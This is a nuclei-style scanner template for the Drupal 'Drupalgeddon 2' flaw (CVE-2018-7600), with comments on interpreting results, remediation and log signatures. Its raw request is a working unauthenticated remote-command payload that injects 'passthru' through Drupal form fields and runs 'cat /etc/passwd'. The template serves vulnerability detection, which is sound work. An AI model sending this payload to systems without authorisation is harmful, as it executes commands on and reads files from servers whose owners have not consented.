# Scanner template (nuclei-style layout) for CVE-2018-7600, "Drupalgeddon 2".
#
# What it does: sends one POST, with no cookies or credentials, to the Drupal
# registration form and reports a finding only when the response shows that a
# shell command ran on the server.
#
# Reading a result:
#   - This is an active check, not a version fingerprint. A match means command
#     execution actually took place on the target and the response body carried
#     passwd-file content, so handle stored scan responses as sensitive data.
#   - A hit means command execution was reachable without authentication.
#     Remediate by upgrading Drupal core to a release that contains the fix for
#     this CVE (see the Drupal security advisory for it), and review the host
#     for earlier compromise, since the flaw was reachable before the scan.
#   - No match is not proof of a patched site. The probe only tries the
#     /user/register path at the web root, and the body matcher only recognises
#     a Unix-style passwd entry.
id: CVE-2018-7600

info:
  name: Drupal Drupalgeddon 2 RCE
  author: pikpikcu
  severity: critical
  reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
  tags: cve,cve2018,drupal,rce

requests:
  # Single raw request. {{Hostname}} is filled in by the scanner per target.
  # Log/WAF signature visible in this request: the `element_parents` query
  # parameter on /user/register combined with form field names whose keys begin
  # with '#' (mail[#post_render][], mail[#type], mail[#markup]).
  # NOTE(review): Content-Length is hard-coded to 626; confirm the engine
  # recomputes it, otherwise it must equal the body length exactly.
  # NOTE(review): the Referer value has no scheme; presumably harmless, confirm.
  - raw:
      - |
        POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: application/json
        Referer: {{Hostname}}/user/register
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
        Content-Length: 626
        Connection: close

        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#post_render][]"

        passthru
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#type]"

        markup
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#markup]"

        cat /etc/passwd
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="form_id"

        user_register_form
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="_drupal_ajax"

    # All three matchers must succeed ("and"), which keeps false positives low:
    # a JSON response alone, or a 200 alone, is not reported.
    matchers-condition: and
    matchers:
      # Response headers must mention application/json (the AJAX reply format
      # requested through _wrapper_format=drupal_ajax and the Accept header).
      - type: word
        words:
          - "application/json"
        part: header

      # Body must contain a root entry in passwd format (password field "x" or
      # "*", then uid 0 and gid 0), i.e. the command's output was echoed back.
      - type: regex
        regex:
          - "root:[x*]:0:0"
        part: body

      # Only a 200 response counts.
      - type: status
        status:
          - 200